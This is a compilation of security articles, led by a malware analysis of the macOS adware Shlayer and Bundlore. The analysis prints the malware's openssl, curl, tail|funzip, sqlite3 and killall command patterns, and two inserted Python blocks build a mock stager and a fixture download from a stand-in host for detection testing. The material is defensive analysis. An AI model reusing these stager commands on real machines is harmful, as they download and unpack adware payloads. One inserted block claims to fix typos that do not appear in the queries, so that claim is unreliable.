
Cyber Security

Shlayer and Bundlore MacOS Malware Strains – How Uptycs EDR Detection Can Help



MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks has not changed: they target older macOS versions and spread through poorly protected websites.

Adware strains Shlayer and Bundlore are the most common malware on macOS. Although they come in slight variations, they have long bypassed XProtect, Notarization, Gatekeeper, and File Quarantine, the security features built into macOS. The Uptycs threat research team has tracked these threats, which, like 90% of the macOS malware seen in our routine analysis and customer telemetry alerts, rely on shell scripts.

In this post, we break down the variations of malicious shell scripts in Shlayer and Bundlore, review the macOS utilities used by these malware strains, and show how Uptycs EDR detection can help.

Shlayer and Bundlore – malicious Shell scripts

The malicious shell scripts used by Shlayer and Bundlore belong to malvertising-focused adware bundlers that use shell scripts in the kill chain to download and install an adware payload. The installers are usually macOS disk image files (DMG) distributed via compromised Google search results or downloaded from websites with a poor reputation (for example, sites offering cracks and keygens).

Upon installation, the disk image is mounted, which starts the bash shell script installation. The bash script is either a single file or a group of files that point to the main bash script. An example of one such DMG file with bash scripts is shown below.

FIG 1-1

The bash files download the second-stage adware payload, which generally lures the victim into installing a fake version of Flash Player, as shown below.

FIG 2-1

Once installed, the malware bombards the victim's machine with ads and also intercepts browser searches in order to modify the search results to promote more ads.

Shlayer and Bundlore – macOS utilities

Shlayer and Bundlore binaries use several macOS utilities in their attack kill chain. Most variants are known to leverage at least 3 of these 5 built-in macOS commands and utilities: openssl, curl, sqlite3, killall and funzip.

The prevalence of these binaries in our daily incoming samples from threat intelligence systems and customer telemetry over the past quarter is shown below.

FIG 3-1

The working and usage of these utilities in the attack kill chain is described below.


openssl is the macOS command-line tool for using the cryptographic functions (SSL, TLS, ciphers) of OpenSSL's crypto library from the shell. We have observed malicious binaries use openssl with base64 encoding and AES (Advanced Encryption Standard) in CBC (Cipher Block Chaining) mode to thwart security scanners, in the format shown below:

openssl enc -aes-256-cbc -d -A -base64 -pass pass:<>


curl is a macOS command-line tool for transferring data using various network protocols. We have observed malicious binaries use curl in the format shown below:

curl -f0L -o /tmp/<><>


killall is used to kill the processes specified by name or pattern match. The malicious binaries use this command to kill the Terminal window the script was started from, in the format shown below:

killall Terminal


sqlite3 is the command-line shell for SQLite, a transactional SQL database engine present in macOS and generally used for databases that can be transported across machines. The malicious binaries use sqlite3 to read the history of files downloaded from the internet, in the format shown below:

sqlite3 /Users/<>/Library/Preferences/<> "select LSQuarantineDataURLString from LSQuarantineEvent where LSQuarantineDataURLString like '' order by LSQuarantineTimeStamp desc limit 5"


funzip is a macOS utility that extracts a ZIP or gzip archive directly to standard output, from a file or from piped input. The malicious binaries use funzip with a password, fed by the head or tail commands, to extract the malicious binary in the format shown below:

tail -c <> $0 | funzip -<password>

Shlayer and Bundlore – Shell script variants with different faces

Though the abused binaries and behavior are the same, the shell scripts come in different forms and variations to evade security scanners. Some of the most commonly seen variants in the wild are:

  • Bash scripts invoking encrypted Zip file
  • Mach-O binary downloading a bash script
  • Bash scripts decoding the payload

We will look into the working of each of these samples.

Bash scripts invoking encrypted Zip file

This variant of bash script uses the head or tail commands to feed an encrypted ZIP file to the funzip utility. An example of one such script is shown below.

FIG 4-1

The functionality of the script is as follows:

  • TEMP_NAME is the location where the unzipped file is written
  • tail reads the last 58856 bytes of the bash script itself
  • funzip -HIC2i1KGA supplies the password of the ZIP file (HIC2i1KGA)
  • chmod +x sets the execute permission on the unzipped file
  • killall Terminal kills the terminal window running the script once the bash script's activity is complete.

This technique bypassed the Gatekeeper, Notarization and File Quarantine security technologies on machines running macOS versions 10.15 to 11.2.
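The funzip usage described in the utilities section and the script walkthrough above both come down to one layout: shell text followed by a trailing archive that the script reads back out of itself with tail and funzip. The following triage helper is an added example, not code from the Uptycs post, that statically inspects a script for that layout from a defender's side: it pulls the tail length and password out of the command line, checks whether the last N bytes really start with a ZIP local file header, reads the encryption flag, and lists the entry names. The fixture it builds is constructed here (placeholder file name "Player", made-up password EXAMPLEPW, unencrypted archive) and reproduces only the layout, not a real sample.

```python
import io
import re
import struct
import zipfile

# Markers a defender can encode from the post's description of the stager:
# "tail -c <N> $0 | funzip -<password>", then chmod +x and killall Terminal.
STAGER_RE = re.compile(r"tail\s+-c\s+(\d+)\s+\$0\s*\|\s*funzip\s+-(\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+\+x\b")
KILLALL_RE = re.compile(r"\bkillall\s+Terminal\b")
OPENSSL_RE = re.compile(r"\bopenssl\s+enc\b.*-pass\s+pass:")   # the openssl variant
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def build_constructed_sample() -> bytes:
    """Constructed lookalike: shell text with an unencrypted ZIP appended.

    It reproduces only the layout the post describes (script + trailing
    archive read back with tail/funzip); the archive holds a placeholder
    text file, not a real payload, and the password is made up.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Player", "placeholder text, constructed for this example\n")
    archive = buf.getvalue()
    script = (
        "#!/bin/bash\n"
        'TEMP_NAME="$(mktemp /tmp/XXXXXX)"\n'
        f'tail -c {len(archive)} $0 | funzip -EXAMPLEPW > "$TEMP_NAME"\n'
        'chmod +x "$TEMP_NAME"\n'
        "killall Terminal\n"
        "exit\n"
    ).encode()
    return script + archive


def triage_script(data: bytes) -> dict:
    """Statically inspect a shell script for the appended-archive stager."""
    text = data.decode("utf-8", errors="replace")
    result = {
        "stager": False,
        "chmod_x": bool(CHMOD_RE.search(text)),
        "killall_terminal": bool(KILLALL_RE.search(text)),
        "openssl_inline_password": bool(OPENSSL_RE.search(text)),
    }
    m = STAGER_RE.search(text)
    if not m:
        return result
    length, password = int(m.group(1)), m.group(2)
    # tail -c N $0 reads the last N bytes of the script file itself
    trailing = data[-length:] if 0 < length <= len(data) else b""
    result.update({
        "stager": True,
        "tail_bytes": length,
        "zip_password": password,
        "trailing_zip": trailing.startswith(ZIP_LOCAL_HEADER),
    })
    if result["trailing_zip"]:
        # ZIP local file header: signature(4) version(2) flags(2) ...;
        # bit 0 of the flags field marks an encrypted entry.
        flags = struct.unpack_from("<H", trailing, 6)[0]
        result["zip_encrypted"] = bool(flags & 0x1)
        try:
            with zipfile.ZipFile(io.BytesIO(trailing)) as zf:
                # entry names are readable even when the data is encrypted
                result["zip_entries"] = zf.namelist()
        except zipfile.BadZipFile:
            result["zip_entries"] = None
    return result


if __name__ == "__main__":
    for key, value in triage_script(build_constructed_sample()).items():
        print(f"{key:25s} {value}")
```

On a real sample the same call reports zip_encrypted as True and still lists the member names, which is usually enough to pivot into the appended archive with the recovered password during incident triage without ever running the script.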

Mach-O Binary downloading a Bash script

This variant has an initial Mach-O binary that downloads the second-stage bash script to install the payload. We identified a malicious binary in our threat intelligence systems that used Amazon AWS storage for hosting and downloading the payload.

Upon execution, the binary downloads a YAML file that points to the bash script named "flashNewInstaller", again hosted in Amazon S3, as shown below.

FIG 5-1

The working of the binary remains largely the same as explained in the 'Bash scripts invoking encrypted Zip file' section.

Bash scripts decoding an encrypted blob

This variant of bash script is seen in large numbers in our telemetry and threat intelligence systems, with several obfuscations in the scripts. The bash script in these variants decrypts encrypted blobs containing the next-stage bash scripts, using openssl with base64 encoding and AES in CBC mode to thwart security scanners.

The initial variants contained easily identifiable and readable first-stage bash scripts, as shown below.

FIG 6-1

However, the latest variants have added several obfuscations to the code to evade security scanners (see Figures 7 and 8).

FIG 7-1

FIG 8-1

While most of the variants and payloads covered so far are detected and blocked by macOS, this variant of bash script and its payloads are not detected by the latest versions of macOS.

Final payload – Bundlore

All the latest samples we analysed ultimately download and install Bundlore. During the installation process, Bundlore also collects the user's password by presenting a misleading prompt, as shown below.

FIG 9-1

With the password in hand, Bundlore does not need any further permissions to perform its actions on the victim's machine.

A majority of binaries in our intelligence systems downloaded the Bundlore payload to the tmp directory using a curl request to the C2, as shown below.

FIG 10-1

The parameters of the C2 translate to the following:

  • c = Campaign ID
  • u = Hardware UUID
  • s = Session GUID
  • o = OS version
  • b = The password which was used in the staged bash scripts

Passive DNS results revealed a large number of such DMG-bundled bash binaries communicating with d2hznnx43bsrxg[.]cloudfront[.]net since May 2021.

Uptycs' EDR capabilities, powered by YARA scanning, detected Bundlore activity with a threat score of 10/10, as shown in the figure below.

FIG 11-1

Additionally, Uptycs EDR contextual detection provides further details about the detected malware. Users can navigate to the toolkit data section in the detection alert and click on the name to find out the behavior and working of Bundlore, as shown in the figure below.

FIG 12-1

Customers can also investigate suspicious behavior by using the following queries:

  • sqlite3 utility used to fetch data from the internet-download history files:
    select * from process_events where path like '%/bin/sqlite3' and cmdline like '%LSQuarantineEvent%'
  • openssl used to decrypt the URL in the downloaded script:
    select * from process_events where path like '%/bin/openssl' and cmdline like '%enc%' and cmdline like '%pass:%'
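The two queries above, together with the utilities section earlier in the post, describe process-level detections. The block below is an added example, not Uptycs code, that runs those detections over constructed osquery-style process_events rows using Python's built-in sqlite3 module as a stand-in for the osquery engine. The first two queries are the post's own (with their quote and "cmdlike" typos fixed); the curl, funzip and killall queries, the row values, the example.invalid host and the password EXAMPLEPW are assumptions made here, and the '<>' in the sqlite3 command line keeps the post's placeholder for the quarantine database file name.

```python
import sqlite3

# Detection queries keyed by name. The first two are the post's own osquery
# queries; the remaining three are assumptions added here to cover the other
# utilities the post lists.
DETECTIONS = {
    "sqlite3_quarantine_history":
        "select pid from process_events where path like '%/bin/sqlite3' "
        "and cmdline like '%LSQuarantineEvent%'",
    "openssl_decrypt_inline_password":
        "select pid from process_events where path like '%/bin/openssl' "
        "and cmdline like '%enc%' and cmdline like '%pass:%'",
    "curl_download_to_tmp":
        "select pid from process_events where path like '%/bin/curl' "
        "and cmdline like '% -o /tmp/%'",
    "funzip_with_password":
        "select pid from process_events where path like '%/bin/funzip' "
        "and cmdline like 'funzip -%'",
    "killall_terminal":
        "select pid from process_events where path like '%/bin/killall' "
        "and cmdline like 'killall Terminal%'",
}

# Constructed process_events rows (pid, path, cmdline) in the shape osquery
# records them; none come from a real host.
SAMPLE_EVENTS = [
    (101, "/usr/bin/sqlite3",
     "sqlite3 /Users/alice/Library/Preferences/<> select LSQuarantineDataURLString "
     "from LSQuarantineEvent order by LSQuarantineTimeStamp desc limit 5"),
    (102, "/usr/bin/openssl",
     "openssl enc -aes-256-cbc -d -A -base64 -pass pass:EXAMPLEPW"),
    (103, "/usr/bin/curl",
     "curl -f0L -o /tmp/EXAMPLE_FILE http://example.invalid/stage2"),
    (104, "/usr/bin/funzip", "funzip -EXAMPLEPW"),
    (105, "/usr/bin/killall", "killall Terminal"),
    # ordinary activity that must not fire
    (201, "/usr/bin/openssl", "openssl x509 -in cert.pem -noout -text"),
    (202, "/usr/bin/sqlite3", "sqlite3 /Users/alice/notes.db select count(*) from notes"),
    (203, "/usr/bin/curl",
     "curl -o /Users/alice/Downloads/report.pdf https://example.invalid/report.pdf"),
    (204, "/usr/bin/killall", "killall Dock"),
]

MIN_UTILITIES_FOR_CHAIN = 3   # the post: most variants use at least 3 of the 5


def load_sample(conn):
    """Create a minimal process_events table and fill it with the constructed rows."""
    conn.execute("create table process_events (pid integer, path text, cmdline text)")
    conn.executemany("insert into process_events values (?, ?, ?)", SAMPLE_EVENTS)


def run_detections(conn):
    """Run every detection query; return {name: sorted pids that matched}."""
    return {name: sorted(row[0] for row in conn.execute(sql))
            for name, sql in DETECTIONS.items()}


def looks_like_stager_chain(hits):
    """True when at least MIN_UTILITIES_FOR_CHAIN distinct detections fired,
    i.e. the host shows the combination of utilities the post describes."""
    return sum(1 for pids in hits.values() if pids) >= MIN_UTILITIES_FOR_CHAIN


def detect_on_sample():
    conn = sqlite3.connect(":memory:")
    load_sample(conn)
    return run_detections(conn)


if __name__ == "__main__":
    hits = detect_on_sample()
    for name, pids in hits.items():
        print(f"{name:35s} {pids}")
    print("stager chain:", looks_like_stager_chain(hits))
```

Each individual query is deliberately loose (the post's '%enc%' matches any command line containing that substring, and the '%pass:%' clause does the real work), so the chain check is what turns five noisy signals into a usable alert: one host emitting three or more of them within a short window matches the behaviour described above far better than any single utility does.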


MacOS malware Shlayer and Bundlore may have variations, but the behavior of their attacks has not changed: they target older macOS versions and spread through poorly protected websites. With Uptycs EDR detection, however, you can protect your devices with best-in-class endpoint detection and response and daily risk tracking.

To keep your devices protected against macOS malware, we recommend the following measures:

  • Keep your devices updated and patched
  • Only download and install files from trusted sources
  • Follow the Shlayer and Bundlore Indicators of Compromise (IOCs) on Github


Athletic shoe maker Brooks runs down cyberattacks with zero-trust segmentation



Ransomware was again the top attack type in 2021, with manufacturing replacing financial services as the top industry in assailants' crosshairs, representing 23.2% of the global attacks remediated last year by IBM Security's X-Force, according to the company's Threat Intelligence Index 2022 report.

Jon Hocut, director of information security for Brooks

With news like this, it is not surprising that “ransomware is the threat that keeps me up the most at night,” says Jon Hocut, director of information security for Brooks, the renowned running shoe manufacturer. It doesn’t help that Brooks’ IT infrastructure “grew over time for quite a while before security became a primary issue,” he says. Therefore, the company sought a cyber security solution to address cyberattacks fast, without first requiring a complete network rebuild.


PJ Kirner, CTO and co-founder of Illumio

Brooks believes it has found this solution in Illumio Core, a zero-trust segmentation (ZTS) platform from Illumio that can be implemented in stages across a corporate network, protecting the most vulnerable areas first — like installing locks on a bank vault and safety deposit box room while leaving the customer records’ room for another time.

“Illumio’s mission at the highest level is to prevent breaches from becoming cyber disasters,” says PJ Kirner, Illumio’s CTO and co-founder. “Our zero-trust segmentation platform helps people limit the impact of those that do occur, while providing visibility and control of the entire network.”

Illumio Core: a pragmatic approach to zero trust

The “trust no one” logic of zero trust requires users to authenticate their identities whenever they request access to data or applications across the network. But “zero-trust segmentation goes further than just isolating different parts of the network,” says David Holmes, senior analyst at Forrester Research. “Zero-trust segmentation solutions isolate each participating computer, only allowing the specific connections and access explicitly declared first. This is why companies like Brooks are doing the right thing by investing both capital and technical resources into zero-trust segmentation, as it solves not just ransomware but generally any other network-oriented breach.”

Illumio’s pragmatic approach to zero-trust segmentation applies it to the most vulnerable areas first—the ones hackers are most likely to attack—and worries about the rest later. It’s an approach that works, according to a study conducted for Illumio by the offensive security firm Bishop Fox, who staged cyberattacks against an Illumio Core-protected network. Based on the results of those unsuccessful attacks, “zero-trust segmentation can be applied to effectively isolate compromised hosts during an active attack,” the Bishop Fox report concludes. “ZTS can (also) be used proactively to ring-fence entire environments and applications, drastically reducing the pathways available for exploitation through lateral movement.”

How Brooks is applying ZTS

In line with “doing what matters most first,” Brooks has applied Illumio Core to block unauthorized access to hundreds of its Windows servers and cloud resources. Most staff are not supposed to access them as part of their jobs, so proactively blocking requests for access until they can be reviewed by IT security staff is a simple, yet effective, cybersecurity solution.

“We’ve separated our users from our servers and our resources, with the goal of only allowing the minimal amount of traffic that’s necessary back and forth,” Hocut says. “Now these servers may need to talk to each other in a lot of ways on a lot of different ports. But the users from their laptops don’t need to talk across those ports, and so we stop them from doing so without explicit permission.”

It is these laptops, operated by non-IT employees with network access, that are most likely to be the targets of hackers through phishing and other such attacks. So, when it comes to making Brooks’ IT infrastructure more secure using ZTS, “the first thing to do is take those laptops that are most likely to be compromised and segment them off from everything,” says Hocut. “So that isn’t zero trust across the enterprise, there’s just less trust. You’re still saying, ‘well, we’ll trust the servers to talk to each other.’ But we will keep the most likely compromised machines away from the most valuable machines and control that traffic as much as possible.”

The Illumio Core platform documents all access requests, allowing the Brooks IT team to analyze this historical record to detect possible breach attempts, access request trends, and other potential signs of past hacker attacks. All of this data is being used to tweak the company’s cybersecurity policies and procedures and shape its approach to ZTS management and expansion throughout the network going forward.

Implementing ZTS has been relatively painless

It took only four months during the second half of 2022 for Brooks to implement Illumio Core ZTS on its network. “Today, we’re just monitoring alerts and following up on them,” says Ryan Fried, Brooks’ senior security engineer. “It’s easy to just let the alerts go by and block traffic for something like RDP, but we do our best to reach out to the user, understand why they were doing it, and then talk to them about the alternative processes that are in place.”

A case in point: In the past, a Brooks employee “might make SQL connections from their laptop to a database, which is terrifying to me,” Fried says. Now, after such an access attempt has been detected and blocked by Illumio Core, “we direct them to a safe server for us, and then we initiate the RDP or SQL connection from there.”

Ironically, the biggest challenge in implementing Illumio Core at Brooks wasn’t digital but analog. Hocut and his security team had to calm the fears of Brooks’ business executives who were uneasy about their network access being moved to ZTS before they could take action.

“Tell someone on the enterprise resource team that you’re going to mess with the firewalls around the ERP system,” says Hocut. “They’re not going to take you out for beers. They’re going to be concerned about how this is going to affect operations.” Even his boss, Brooks’ VP of Information Technology, wanted to know how the move to ZTS could be done without causing downtime, and maintained without causing issues. “I had to build trust with everyone by explaining that Ryan would set up a proposed ZTS rule set and run it non-operationally for a while to make sure it worked, before taking Illumio Core live,” he says.

Testing before deployment is essential

Doing such testing before deploying any ZTS system is a must, says Holmes. “Zero-trust segmentation is very effective but requires work up front to define the correct segmentation policy,” he explains. “Incorrect policy results in local network outages and manual tuning, adding a layer of complexity to the management of the network. Modern ZTS solutions work hard to divine the correct policy for you, but even the models that use AI aren’t 100% accurate and tuning is required.” Having done this work, Brooks’ ZTS system is working as promised, providing the company with proactive protection from ransomware and other cyber threats.

Looking ahead, Hocut plans to extend Illumio Core into other parts of Brooks’ IT infrastructure. “We’re looking to tighten the granularity of our network controls with different groups of servers so that we’re not treating all servers the same,” he says. “We’re going to be watching outbound traffic from the servers as well. Servers have very specific functions and should only be talking to the outside world in very specific ways. And we can use Illumio to learn what all those current ways are, making the assumption that those are probably all good — and block absolutely everything else.”

Copyright © 2022 IDG Communications, Inc.


Ransomware attack knocks Rackspace’s Exchange servers offline



Cloud services and hosting provider Rackspace Technology acknowledged Tuesday that a recent incident that took most of its Hosted Exchange email server business offline was the product of a ransomware attack. The company shut the service down last Friday.

It was not, initially, clear what had caused the outage, but Rackspace quickly moved to shift Exchange customers over to Microsoft 365, as this part of the company’s infrastructure was apparently unaffected.

Rackspace offers migration to Microsoft 365

Rackspace said today that there is “no timeline” for a restoration of Exchange service, but it is offering Exchange users technical assistance and free access to Microsoft 365 as a substitute, though it acknowledged that migration is unlikely to be a simple process for every user. Rackspace said that, while the migration is in progress, customers can forward email sent to their Hosted Exchange inboxes to an external server, as a temporary workaround.

The company said that the incident was isolated to its Hosted Exchange business, and that the rest of its lineup of products and services are fully functional. It’s unclear how Rackspace was able to limit the access of the ransomware attackers to one corner of its operations, and the company did not respond to a request for comment on this point.

The investigation is “still in its early stages,” according to Rackspace’s official updates on the matter. The company added that it is, as yet, unable to ascertain whether any consumer data was affected by the attack, but pledged to notify customers if that proves to be the case. Some email archives remain accessible, according to the updates, and Rackspace said that it is working to provide those to customers “where available,” as a precursor to migrating over to Microsoft 365.

Rackspace has also hired “a leading cyber defense firm” to assist in the investigation, though it declined to name the company publicly.

“Out of an abundance of caution, we have put additional security measures in place and will continue to actively monitor for any suspicious activity,” Rackspace said in its latest advisory.

In a public statement, the company said that, despite the ongoing nature of its investigation, it can say that the cyberattack has affected its bottom line. The Hosted Exchange business generates roughly $30 million a year, and a prolonged outage, with its associated costs, is likely to dent that figure.

Copyright © 2022 IDG Communications, Inc.


Rethinking DDoS Defenses | CSO Online



The other night I rented a movie called “The Biggest Little Farm.” The movie depicted a couple who were new to farming but attempting to regenerate a farm that had fallen into disrepair. In the process, they continually ran into challenges regarding how to protect the crops and animals on the farm. Initially, they brought in goats to eat some of the overgrown vegetation, which in turn attracted the initial threat, which was coyotes, who were killing the goats and some of their chickens, so they put up a fence. Then birds of prey became a threat, so the farmers installed roofs on the cages. Then it was rabbits and gophers eating the vegetables, and so on. Each time they encountered a new challenge, the farmers had to adapt and build a new defense. In some cases, they didn’t know what was coming next or how to fight it, so they talked to neighbors to understand how they did it. I started thinking that although this was taking place on a farm, it was the typical approach to perimeter protection whether on a farm, a castle, a fort, or — in today’s world — your network.

This movie was particularly thought-provoking to me as I began reading the current NETSCOUT DDoS Threat Intelligence Report in preparation for a project regarding today’s networks and how customers manage DDoS attacks. The report highlights that distributed denial-of-service (DDoS) attacks are again evolving. This year, reflection/amplification attacks, which have been the preferred attack vector over the past couple of years, took a back seat to TCP state exhaustion attacks. What this indicates is the bad actors are attempting to execute attacks that are increasingly difficult to detect because they mimic legitimate traffic and require defenders to have some level of expertise and technology to recognize them as attacks. 

Adaptive DDoS attacks on the rise

The threat report also reveals that one of the ways attackers are becoming more effective in the destruction of network availability is by using adaptive DDoS. In an adaptive DDoS attack, adversaries perform extensive pre-attack reconnaissance to identify specific elements of the service delivery chain to target. For example, state exhaustion attacks, which made up four of the top five attack vectors this year, target stateful devices that are an integral part of the security stack, such as firewalls and VPN concentrators. These targets are attractive because the attacks against them can be smaller in size and designed to evade defenses meant for other threats. Think of the fence designed for the coyotes that won't stop weasels because the openings are too big. These types of preparations are calculated to minimize the number of administrative boundaries DDoS attack traffic must traverse, often resulting in fewer opportunities to detect and mitigate the attack. Figure 1 lists some of the characteristics of adaptive DDoS attacks.


Figure 1: Five characteristics of adaptive DDoS attacks

Because of these advances in attack methods, network operators must adapt their defenses to meet the new challenges. In our experience, and primarily due to the nature of ever-changing attacks, the required defense needs to be able to not only manage volumetric attacks but also identify the many attacks currently designed to elude known defense measures. And in most cases, this is not a situation where there is a one-size-fits-all solution. As in “The Biggest Little Farm,” the ever-changing threat landscape we are currently experiencing requires an agile defense model — in this case, one that works inside and outside the network and adapts to changing attack vectors and methods.

Why you need a hybrid defense strategy

The best practice for protecting your network in today’s ever-changing DDoS attack landscape is a hybrid approach. Protection strategies of the past will suffice in some situations, such as in an attack designed to overwhelm your internet circuit before traffic arrives on your site. However, attacks specifically designed to evade those protections, such as TCP state exhaustion and application-layer attacks, are the basis for the new attack landscape. Furthermore, the ability to respond quickly to attacks that dodge the cloud solution and hit the network edge, or an internet-facing service is imperative, and having the agility to change defenses rapidly to adapt to subtle changes in adaptive DDoS onsite is crucial.


Figure 2: NETSCOUT Omnis AED provides hybrid DDoS defense

By implementing adaptive DDoS defenses such as NETSCOUT’s Omnis Adaptive Edge Defense (AED) at all edges of their networks, network operators can overpower DDoS attack traffic as it enters the network edge — or before it ever unites into a large-scale attack. With edge-based attack detection combined with cloud-scrubbing capacity, automated bilayer communication, indicators of compromise (IoC) analysis, command-and-control (C2) communication blocking, and current actionable threat intelligence (think of the farmers talking to their neighbors), operators can tackle any DDoS attack before it can cause damage (see Figure 2).

As the movie ended, the farmers were getting the constantly evolving threats nature could throw at them under control. The underlying reason for that control was that they had begun to understand the developing threats and were proactive in their actions to block them. This could be a valuable lesson in our approach to the new methods behind DDoS attacks.

For more information on hybrid, dynamic, comprehensive DDoS protection, download the white paper “An On-Premises Defense Is the Cornerstone for Multilayer DDoS Protection.” 

Copyright © 2022 IDG Communications, Inc.
